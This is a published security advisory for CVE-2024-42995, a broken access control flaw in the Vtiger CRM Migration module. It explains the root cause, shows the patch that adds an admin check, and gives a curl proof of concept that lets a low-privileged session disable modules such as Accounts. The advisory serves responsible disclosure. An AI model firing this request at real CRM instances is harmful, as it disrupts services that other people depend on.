Vtiger CRM (<= 8.1.0) Broken Access Control in Migration module

Summary

Vtiger CRM <= 8.1.0 does not correctly check user’s privileges. A low-privileged user can interact directly with the Migration administrative module to disable arbitrary modules in the instance.

CVE(s)

• CVE-2024-42995

Product description (from vendor)

“Vtiger all-in-one CRM empowers you to align your marketing, sales and support teams with unified customer data powered by One View. CRM made easy. Vtiger is built around a Open Source core. We remain committed to growing and nurturing the community”

Details

Root cause analysis

Vtiger CRM uses a MVC-like architecture. When Vtiger receives an HTTP POST request, the Vtiger_WebUI class dispatches it to the appropriate controller based on the values of the module and the action parameters by using the Vtiger_Loader::getComponentClassName function.

This function concatenates the module name, the action name, and the Action string, separating them with underscores, e.g. module=Migration&action=DisableModules becomes Migration_DisableModules_Action.

Every controller must extend the Vtiger_Action_Controller class, that implements default functions and flags, for example defining loginRequired=true or a checkPermission function that check if users are authenticated and have enough privileges to perform an action. Those controller functions will be called by the Vtiger_WebUI during the handling of a request.

The DisableModules action in the Migration module allows an administrative user to disable a list of modules currently loaded in the Vtiger CRM instance.

However, the Migration_DisableModules_Action class does not implement a specific checkPermission function, thus falling back to the default implementation that grants access to every authenticated user.

The following code shows the patch, implementing a stricter check allowing only actions from admin users:

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26

class Migration_DisableModules_Action extends Vtiger_Action_Controller {

    // ---- START PATCH ----
    public function checkPermission(\Vtiger_Request $request) {
         parent::checkPermission($request);
         $currentUserModel = Users_Record_Model::getCurrentUserModel();
         if(!$currentUserModel->isAdminUser()) {
              throw new AppException(vtranslate('LBL_PERMISSION_DENIED', 'Vtiger'));
         }
         return true;
    }
    // ---- END PATCH ----

    public function process(Vtiger_Request $request) {
        $modulesList = $request->get('modulesList');
        if ($modulesList) {
            $moduleManagerModel = new Settings_ModuleManager_Module_Model();
            foreach ($modulesList as $moduleName) {
                $moduleManagerModel->disableModule($moduleName);
            }
        }

        header('Location: migrate/index.php');
    }

}

Proof-of-concept

1. Log into the portal with low privileges user.
2. Copy the PHPSESSID cookie value and the value of the __vtrftk parameter used in the requests.
3. Execute the following POST request exporting the target Vtiger CRM domain, the low privileges user cookie and a valid anti-CSRF token:

1
2
3
4

export RHOST=https://TARGET
export COOKIE=<cookie>
export TOKEN=<csrf-token>
curl -s --b "PHPSESSID=${COOKIE}" --data-binary "__vtrftk=${TOKEN}&module=Migration&modulesList[]=Accounts&action=DisableModules" "${RHOST}/index.php"

4. Notice the 302 Found HTTP response, meaning the module Accounts has been correctly disabled.

Impact

An authenticated attacker could disable arbitrary modules to cause a service disruption.

Remediation

Upgrade to Vtiger CRM 8.2.0 or later.

Patched in commit.

Disclosure timeline

This report was subject to Shielder’s disclosure policy:

• 09/02/2024: initial report is sent to support@vtiger.com.
• 16/02/2024: Vtiger acknowledges the issue and begins the triage process.
• 20/03/2024: Vtiger is able to reproduce the issue and develops a patch.
• 15/05/2024: Vtiger publishes the patched version the code.
• 28/08/2024: Shielder’s advisory is published.

Credits

• Mattia `Mindless` Ricciardi
• Paolo `paupu` Cavaglià
• Davide `TheZero` Silvetti

This advisory was first published on https://www.shielder.com/advisories/vtiger-migration-bac/